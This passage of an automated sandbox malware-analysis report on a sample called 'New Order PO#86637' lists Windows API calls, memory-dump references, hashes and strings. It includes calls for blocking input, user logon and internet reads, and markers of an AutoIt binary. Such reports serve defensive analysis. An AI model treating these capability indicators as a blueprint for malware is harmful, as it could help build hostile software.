                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                            • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                            • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                            • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                            • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                            • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                            • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                            • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                            • String ID:
                                                                            • API String ID: 901099227-0
                                                                            • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                            • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                            • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                            • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                            APIs
                                                                            • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Proc
                                                                            • String ID:
                                                                            • API String ID: 2346855178-0
                                                                            • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                            • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                            • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                            • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 0045A38B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                            • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                            • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                            • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                            • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                            • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                            • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                            • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                            • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                            • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                            • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                            • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                            • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: N@
                                                                            • API String ID: 0-1509896676
                                                                            • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                            • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                            • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                            • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                            • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                            • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                            • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                            • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                            • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                            • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                            • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                            • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                            • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                            APIs
                                                                            • DeleteObject.GDI32(?), ref: 0045953B
                                                                            • DeleteObject.GDI32(?), ref: 00459551
                                                                            • DestroyWindow.USER32(?), ref: 00459563
                                                                            • GetDesktopWindow.USER32 ref: 00459581
                                                                            • GetWindowRect.USER32(00000000), ref: 00459588
                                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                            • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                            • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                            • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                            • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                            • _wcslen.LIBCMT ref: 00459916
                                                                            • _wcscpy.LIBCMT ref: 0045993A
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                            • GetDC.USER32(00000000), ref: 004599FC
                                                                            • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                            • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 4040870279-2373415609
                                                                            • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                            • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                            • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                            • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 0044181E
                                                                            • SetTextColor.GDI32(?,?), ref: 00441826
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                            • GetSysColor.USER32(0000000F), ref: 00441849
                                                                            • SetBkColor.GDI32(?,?), ref: 00441864
                                                                            • SelectObject.GDI32(?,?), ref: 00441874
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                            • GetSysColor.USER32(00000010), ref: 004418B2
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                            • DeleteObject.GDI32(?), ref: 004418D5
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                            • FillRect.USER32(?,?,?), ref: 00441970
                                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
